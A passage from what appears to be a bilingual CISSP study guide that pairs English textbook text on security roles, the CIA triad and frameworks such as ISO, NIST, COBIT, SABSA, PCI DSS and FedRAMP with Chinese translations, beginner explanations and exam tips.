Custodian The custodian role is assigned to the person who is responsible for the tasks of implementing the prescribed protection defined by the security policy and senior management. The custodian

中文直译 / 整理

安全基础设施。 有关专门针对数据管理的角色,请参见第5章。 以下是典型安全环境中常见的安全角色: 高级经理 组织所有者(高级经理)角色指对组织所维护的安全负最终责任 的人,此人应最关注其资产的保护。 高级经理必须签署所有安全政策问题。 如果高级管理层未授权并支持安全政策,则该政策无效。 高级经理将对安全 解决方案的整体成败承担责任,并负责在建立组织安全时履行应有的注意义 务和谨慎职责。 尽管高级经理对安全负最终责任,但他们很少亲自实施安全 解决方案。 在大多数情况下,这一责任会委托给组织内部的安全专业人员。 安全专业人员 安全专业人员、信息安全(InfoSec)官员 或 网络安全事件响 应团队(CIRT) 角色指经过培训且富有经验的网络、系统和安全工程师, 负责执行高级管理层下达的指令。 安全专业人员对安全负有职能责任,包括 编写和实施安全政策。 安全专业人员的角色可能被归类为IS/IT角色,但其重 点在于保护而非功能。 安全专业人员角色通常由一个团队担任,该团队负责 根据批准的安全政策设计和实施安全解决方案。 安全专业人员不是决策者, 而是执行者。 所有决策必须留由高级经理做出。

资产所有者 资产所有者 角色分配给负责对信息进行分类以在安全解决方案 中进行放置和保护的人员。 资产所有者通常是最终对资产保护负全责的高级 管理人员。 然而,资产所有者通常会将实际数据管理任务的责任委托给保管 人。 保管人 保管人 角色指负责实施安全策略和高级管理层所规定的保护措 施的人员。 保管人

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

高级管理者:高级管理者承担安全最终责任。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

问最终责任,通常不是管理员,而是 senior management。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
高级管理者 高级管理者承担安全最终责任。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 28 / PDF P105

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

performs all activities necessary to provide adequate protection for the CIA Triad (confidentiality, integrity, and availability) of data and to fulfill the requirements and responsibilities delegated by upper management. These activities can include performing and testing backups, validating data integrity, deploying security solutions, and managing data storage based on classification. User The user (end user or operator) role is assigned to any person who has access to the secured system. A user's access is tied to their work tasks and is limited so that they have only enough access to perform the tasks necessary for their job position (the principle of least privilege).

Users are responsible for understanding and upholding the security policy of an organization by following prescribed operational procedures and operating within defined security parameters. Auditor An auditor is responsible for reviewing and verifying that the security policy is properly implemented and the derived security solutions are adequate. The auditor produces compliance and effectiveness reports that are reviewed by the senior manager. Issues discovered through these reports are transformed into new directives assigned by the senior manager to security professionals or custodians. All of these roles serve an important function within a secured environment.

They are useful for identifying liability and responsibility as well as for identifying the hierarchical management and delegation scheme. Security Control Frameworks One of the first and most important security planning steps is to consider the overall security control framework or structure of the security solution desired by the organization. Security control frameworks, often referred to as security frameworks or cybersecurity frameworks, are structured sets of guidelines, standards, best practices, and controls designed to help organizations effectively manage and enhance their information security and cybersecurity posture.

These frameworks provide a systematic and comprehensive approach to identifying, implementing, and monitoring security controls and measures to protect an organization's data, systems, networks, and sensitive information. There are numerous organizations that produce and maintain security control frameworks. International Organization for Standardization (ISO)

中文直译 / 整理

需执行所有必要活动,以确保数据的机密性、完整性和可用性(CIA三元 组)得到充分保护,并履行上级管理层委派的要求和职责。 这些活动可包 括执行和测试备份、验证数据完整性、部署安全解决方案以及根据分类管 理数据存储。 用户 用户(最终用户或操作员)角色分配给任何有权访问受保护系统的人员。 用户的访问权限与其工作任务相关联,并受到限制,以确保其仅拥有执行工 作职责所必需的最低权限(最小权限原则)。 用户有责任理解并遵守组织的 安全策略,遵循规定的操作流程,并在既定的安全参数范围内操作。 审计员 审计员负责审查和验证安全策略是否得到正确实施,以及由此产生 的安全解决方案是否充分。 审计员生成合规性和有效性报告,由高级管理人 员审阅。 通过这些报告发现的问题将转化为高级管理人员分配给安全专业人 员或保管人的新指令。 所有这些角色在受保护环境中都发挥着重要作用。 它们有助于明确责任与义务, 同时也有助于识别层级管理与授权机制。 安全控制框架 安全规划的首要且最重要的步骤之一是考虑组织所期望的安全解决方案的整体 安全控制框架或结构。

安全控制框架通常被称为安全框架或网络安全框架,是 一套结构化的指南、标准、最佳实践和控制措施,旨在帮助组织有效管理和提 升其信息安全和网络安全态势。 这些框架提供了一种系统化且全面的方法,用 于识别、实施和监控安全控制措施,以保护组织的数据、系统、网络和敏感信 息。 有许多组织生产和维护安全控制框架。 国际标准化组织(ISO)

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
高级管理者 高级管理者承担安全最终责任。
安全控制框架 控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。
学习单元 29 / PDF P106

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The International Organization for Standardization (ISO) is a worldwide standards-setting group of representatives from various national standards organizations. ISO defines standards for industrial and commercial equipment, software, protocols, and management, among others. It issues six main products: International Standards, Technical Reports, Technical Specifications, Publicly Available Specifications, Technical Corrigenda, and Guides. ISO standards are widely accepted across many industries and have even been adopted as requirements or laws by various governments. For more information on ISO, please visit ISO.org.

Specifically, the ISO/IEC 27000 family group is an international security standard that can be the basis for implementing organizational security and related management practices. (The International Electrotechnical Commission [IEC] is an international standards organization that prepares and publishes international standards for all electrical, electronic, and related technologies. ISO and IEC often work together in establishing worldwide standards.) National Institute of Standards and Technology (NIST) The National Institute of Standards and Technology (NIST) is a U.S. federal agency that operates under the umbrella of the U.S. Department of Commerce.

NIST's mission is to promote and maintain measurement standards, as well as advance technology and innovation. It plays a pivotal role in developing and promoting standards and best practices, especially in the areas of science and technology. NIST is responsible for establishing and maintaining various standards, including those related to computer security. One of the most well-known publications from NIST is the NIST Special Publication (SP) 800-53 “Security and Privacy Controls for Information Systems and Organizations,” which outlines a comprehensive set of security controls and guidelines for information systems used by U.S. federal agencies.

This publication is widely used as a reference for implementing information security practices, especially within government organizations and in various sectors that handle sensitive data. NIST also established the Risk Management Framework (RMF) and Cybersecurity Framework (CSF) (both covered in Chapter 2).

中文直译 / 整理

国际标准化组织(ISO)是一个由各国标准化组织代表组成的全球性标准制定 组织。 ISO为工业和商业设备、软件、协议和管理等方面制定标准。 它发布六 种主要产品:国际标准、技术报告、技术规范、公开可用规范、技术勘误和指 南。 ISO标准在许多行业中被广泛接受,甚至被某些政府采纳为要求或法律。 有关ISO的更多信息,请访问ISO.org。 具体而言,ISO/IEC 27000系列是一套 国际安全标准,可作为实施组织安全及相关管理实践的基础。 (国际电工委员 会[IEC] 是一个国际标准组织,负责制定和发布所有电气、电子及相关技术的 国际标准。 ISO和IEC经常共同制定全球标准。 ) 美国国家标准与技术研究院(NIST) 美国 国家标准与技术研究院(NIST) 是隶属于美国商务部的联邦机构。 NIST 的使命是促进和维护测量标准,并推动技术和创新。 它在制定和推广科 学与技术领域的标准和最佳实践方面发挥着关键作用。 NIST 负责建立和维护 各种标准,包括与计算机安全相关的标准。

NIST 最著名的出版物之一是 NIST 特别出版物(SP)800‑53《信息系统和组织的安全与隐私控制》,其中 概述了美国联邦机构所使用信息系统的全面安全控制和指南。 该出版物被广泛 用作实施信息安全实践的参考,尤其在政府机构和处理敏感数据的各个行业中。 NIST 还建立了风险管理框架(RMF) 和 网络安全框架(CSF)(均在第2章 中涵盖)。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 30 / PDF P107

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The Center for Internet Security (CIS) provides OS, application, and hardware security configuration guides at www.cisecurity.org/cisbenchmarks. These are not considered security control frameworks, but they are often used in conjunction with them. Control Objectives for Information and Related Technologies (COBIT) Control Objectives for Information and Related Technologies (COBIT) is a documented set of best IT security practices crafted by ISACA.

(Previously spelled out as Information Systems Audit and Control Association, however the organization no longer uses the full name only the acronym as their name.) It prescribes goals and requirements for security controls and encourages the mapping of IT security ideals to business objectives. COBIT is based on six key principles for the governance and management of enterprise IT: Provide Stakeholder Value Holistic Approach Dynamic Governance System Governance Distinct from Management Tailored to Enterprise Needs End-to-End Governance System COBIT is used not only to plan the IT security of an organization but also as a guideline for auditors (www.isaca.org/resources/cobit).

Sherwood Applied Business Security Architecture (SABSA) Sherwood Applied Business Security Architecture (SABSA) is a framework and methodology for developing risk-driven enterprise security and information assurance architectures. It is known for its holistic and businessfocused approach to security architecture. Key aspects of SABSA include:

中文直译 / 整理

互联网安全中心(CIS) 提供操作系统、应用程序和硬件的安全配置指 南,网址为 www.cisecurity.org/cisbenchmarks。 这些指南不被视为安全 控制框架,但通常与它们结合使用。 信息及相关技术控制目标(COBIT) 信息及相关技术控制目标(COBIT)是由ISACA制定的一套经过文档化的最佳 IT安全实践。 (此前全称为信息系统审计与控制协会,但该组织现已不再使用 全称,仅以缩写作为名称。 )它规定了安全控制的目标和要求,并鼓励将IT安 全理念与业务目标相映射。 COBIT基于企业IT治理与管理的六大关键原则: 提供利益相关者价值 整体性方法 动态治理系统 治理与管理相分离 专为企业需求定制 端到端治理系统 COBIT 不仅用于规划组织的 IT 安全,还作为审计人员的指南( www.isaca.org/resources/cobit)。 Sherwood 应用业务安全架构(SABSA) Sherwood 应用业务安全架构(SABSA)是一种用于开发以风险为导向的企业 安全和信息保障架构的框架与方法论。 它以其全面且以业务为中心的安全架构 方法而闻名。 SABSA的关键方面包括:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

安全控制框架:控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。

COBIT:COBIT 偏 IT 治理和控制目标。

SABSA:SABSA 强调业务驱动、风险导向的安全架构。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

ISO、NIST、COBIT、SABSA、PCI DSS、FedRAMP 都常考。

COBIT 常用于治理、控制、审计和业务价值。

题目强调业务需求驱动架构时留意 SABSA。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
安全控制框架 控制框架是一套帮助组织系统化管理安全的指南、标准和控制集合。
COBIT COBIT 偏 IT 治理和控制目标。
SABSA SABSA 强调业务驱动、风险导向的安全架构。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 31 / PDF P108

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Risk-focused: SABSA places a strong emphasis on identifying and managing security risks within the context of the business. It aims to align security measures with an organization's specific risks and objectives. Business-driven: SABSA promotes the idea that security should be integrated into an organization's business processes and goals. It helps organizations understand how security supports and enables business activities. Layered approach: SABSA uses a layered architectural model to address security concerns at various levels, from strategic planning down to operational security controls.

These layers include the business context, information domain, systems, technology, and physical security. Framework and methodology: SABSA provides a structured framework for developing security architectures and a comprehensive methodology for designing, implementing, and managing security solutions. Certification: SABSA offers a certification program that allows security professionals to become certified in SABSA methodologies and practices. SABSA is often used in large organizations and enterprises where a robust and business-aligned approach to security architecture is required.

It helps organizations create security architectures that are not only effective in addressing security risks but that are also closely tied to the organization's strategic goals and objectives. Payment Card Industry Data Security Standard (PCI DSS) Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards and requirements designed to ensure the protection of sensitive credit card and debit card information. PCI DSS was established by major credit card companies to enhance the security of payment card transactions and to protect cardholder data.

Key components of PCI DSS include: Data security: PCI DSS sets guidelines for the secure handling of payment card data, including cardholder names, primary account numbers (PANs), expiration dates, and card verification values (CVVs). Network security: PCI DSS mandates the implementation of robust network security practices, including firewalls, encryption, and access

中文直译 / 整理

以风险为导向:SABSA强调在业务背景下识别和管理安全风险。 它旨 在使安全措施与组织的具体风险和目标保持一致。 业务驱动:SABSA 强调安全应融入组织的业务流程和目标中。 它帮助组 织理解安全如何支持和促进业务活动。 分层方法:SABSA 采用分层架构模型,从战略规划到运营安全控制,应 对不同层面的安全问题。 这些层次包括业务背景、信息领域、系统、技术 和物理安全。 框架与方法论:SABSA 提供了一套结构化的框架,用于开发安全架构, 以及一套全面的方法论,用于设计、实施和管理安全解决方案。 认证:SABSA 提供认证计划,使安全专业人员能够获得 SABSA 方法和实践 的认证。 SABSA 常用于需要强大且与业务对齐的安全架构的大规模组织和企业。 它 帮助组织创建不仅有效应对安全风险,而且与组织的战略目标和宗旨紧密关 联的安全架构。 支付卡行业数据安全标准(PCI DSS) 支付卡行业数据安全标准(PCI DSS)是一套安全标准和要求,旨在确保敏感 信用卡和借记卡信息的保护。 PCI DSS 由主要信用卡公司建立,以增强支付 卡交易的安全性并保护持卡人数据。

PCI DSS 的关键组成部分包括: 数据安全:PCI DSS 为支付卡数据的安全处理制定了指南,包括持卡人 姓名、主账户号码(PAN)、过期日期和卡片验证值(CVV)。 网络安全:PCI DSS要求实施强大的网络安全措施,包括防火墙、加密和 访问

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

分层:分层把控制按层排列,让攻击者必须连续突破。

加密:加密把内容变成未授权者看不懂的形式。

战略计划:战略计划是长期、稳定、方向性的安全计划。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Strategic 长期,Tactical 中期,Operational 短期日常。

题目强调业务需求驱动架构时留意 SABSA。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
分层 分层把控制按层排列,让攻击者必须连续突破。
加密 加密把内容变成未授权者看不懂的形式。
战略计划 战略计划是长期、稳定、方向性的安全计划。
SABSA SABSA 强调业务驱动、风险导向的安全架构。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
学习单元 32 / PDF P109

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

controls, to protect cardholder data during transmission. Access control: PCI DSS requires organizations to restrict access to cardholder data on a need-to-know basis. Access should be limited to authorized personnel only. Regular monitoring and testing: Continuous monitoring and regular security testing are necessary to identify and address vulnerabilities in systems and applications that process cardholder data. Information security policies: Organizations must develop and maintain comprehensive security policies and procedures to guide employees in secure practices related to payment card data.

Vulnerability management: This involves the timely identification and remediation of security vulnerabilities to protect against potential threats. Physical security: PCI DSS also includes requirements for the physical security of cardholder data, including restricted access to servers, storage, and point-of-sale (POS) devices. Incident response: Having an incident response plan is essential to respond promptly and effectively to security incidents and data breaches. Compliance audits: Organizations that handle payment card data are required to undergo regular PCI DSS compliance audits.

These audits are conducted by independent qualified security assessors (QSAs) or internal security assessors (ISAs) who are certified to assess compliance. The goal of these audits is to determine whether the organization complies with the PCI DSS requirements. Compliance with PCI DSS is mandatory for any entity that processes payment card transactions, including merchants, service providers, and financial institutions. Failure to comply with PCI DSS can lead to fines, loss of card processing privileges, and reputational damage.

PCI DSS is typically updated periodically to address evolving security threats and technology changes, so organizations subject to its requirements must stay current with the latest version and maintain compliance. Federal Risk and Authorization Management Program (FedRAMP) The Federal Risk and Authorization Management Program (FedRAMP) is a U.S. government-wide program designed to standardize the security

中文直译 / 整理

控制,以在传输过程中保护持卡人数据。 访问控制:PCI DSS 要求组织根据需要知悉的原则限制对持卡人数据 的访问。 访问应仅限于授权人员。 定期监控和测试:需要进行持续监控和定期安全测试,以识别和解决处理持卡 人数据的 系统和应用程序中的漏洞。 信息安全政策:组织必须制定并维护全面的安全政策和程序,以指导员工在 与支付卡数据相关的安全实践中。 漏洞管理:这涉及及时识别和修复安全漏洞,以防范潜在威胁。 物理安全:PCI DSS 还包括对持卡人数据物理安全的要求,包括对服务器、 存储设备和销售点(POS)设备的访问限制。 事件响应:制定事件响应计划对于及时有效地应对安全事件和数据泄露至关重 要。 合规审计:处理支付卡数据的组织必须定期接受 PCI DSS 合规审计。 这些 审计由经认证的独立合格安全评估员(QSA)或内部安全评估员(ISA)进 行,以评估合规性。 这些审计的目标是确定组织是否符合 PCI DSS 的要求。 任何处理支付卡交易的实体,包括商户、服务提供商和金融机构,都必须遵守 PCI DSS。 未能遵守 PCI DSS 可能导致罚款、失去卡片处理权限以及声誉受损。

PCI DSS 通常会定期更新,以应对不断演变的安全威胁和技术变化,因此受 其要求约束的组织必须跟上最新版本并保持合规。 联邦风险与授权管理计划(FedRAMP) 联邦风险与授权管理计划(FedRAMP)是美国政府范围内的计划,旨在标准化 联邦机构使用的云产品和服务的安全

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

信用卡/持卡人数据场景优先想到 PCI DSS。

美国政府云服务、云授权、持续监控常对应 FedRAMP。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
FedRAMP FedRAMP 用于美国联邦云服务授权和持续监控。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 33 / PDF P110

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

assessment, authorization, and continuous monitoring processes for cloud products and services used by federal agencies. Its primary goal is to ensure that cloud services meet stringent security requirements and can be used by U.S. government organizations to process, store, and transmit sensitive and classified information. Key elements of FedRAMP include: Security standardization: FedRAMP establishes a set of security controls, baselines, and requirements that cloud service providers (CSPs) must adhere to when offering cloud solutions to federal agencies. These requirements are based on NIST SP 800-53, which outlines security controls for federal information systems.

Authorization process: CSPs seeking to offer their cloud services to federal agencies must go through a rigorous authorization process. This process involves a comprehensive security assessment, documentation, and evaluation by a third-party assessment organization. Continuous monitoring: Once authorized, CSPs are required to maintain ongoing security monitoring and reporting to ensure that their services continue to meet the established security standards and remain secure throughout their life cycle. Reuse of authorizations: FedRAMP encourages the reuse of security authorizations across federal agencies.

When a CSP receives a FedRAMP authorization, other agencies can reuse that authorization rather than conducting their own assessments, streamlining the procurement process. Collaboration: FedRAMP fosters collaboration between federal agencies, CSPs, and third-party assessors. It aims to create a more efficient and standardized approach to cloud security while reducing duplication of effort. Three impact levels: FedRAMP has three impact levels (low, moderate, and high) to account for different levels of sensitivity and classification of federal data. The required security controls and assessment processes vary based on the impact level.

Compliance framework: FedRAMP provides a framework that ensures the security of cloud services and helps federal agencies make informed decisions when selecting and implementing cloud solutions.

中文直译 / 整理

评估、授权和持续监控流程。 其主要目标是确保云服务符合严格的安全要求, 并使美国政府机构能够用于处理、存储和传输敏感及机密信息。 FedRAMP的关键要素包括: 安全标准化:FedRAMP建立了一套安全控制措施、基线和要求,云服务 提供商(CSP)在向联邦机构提供云解决方案时必须遵守。 这些要求基于 NIST SP 800‑53,该标准规定了联邦信息系统的安全控制措施。 授权流程:希望向 联邦机构提供云服务的CSP必须通过严格的授权流程。 该流程包括由第三 方评估机构进行的全面安全评估、文档编制和评估。 持续监控:获得授权后,CSP必须进行持续的安全监控和报告,以确保其 服务持续符合既定的安全标准,并在整个生命周期内保持安全。 授权复用:FedRAMP鼓励在联邦机构之间复用安全授权。 当CSP获得 FedRAMP授权后,其他机构可以复用该授权,而无需进行自身的评估, 从而简化采购流程。 协作:FedRAMP 促进联邦机构、云服务提供商(CSP)和第三方评估机 构之间的协作。 它旨在建立一种更高效、标准化的云安全方法,同时减少 重复工作。

三个影响级别:FedRAMP 设有三个影响级别(低、中、高),以应 对联邦数据的不同敏感度和分类级别。 所需的安全控制措施和评估流程根 据影响级别而有所不同。 合规框架:FedRAMP 提供了一个框架,确保云服务的安全性,并帮助 联邦机构在选择和实施云解决方案时做出明智的决策。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

FedRAMP:FedRAMP 用于美国联邦云服务授权和持续监控。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

美国政府云服务、云授权、持续监控常对应 FedRAMP。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
FedRAMP FedRAMP 用于美国联邦云服务授权和持续监控。
标准 标准给出必须满足的最低要求。
学习单元 34 / PDF P111

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

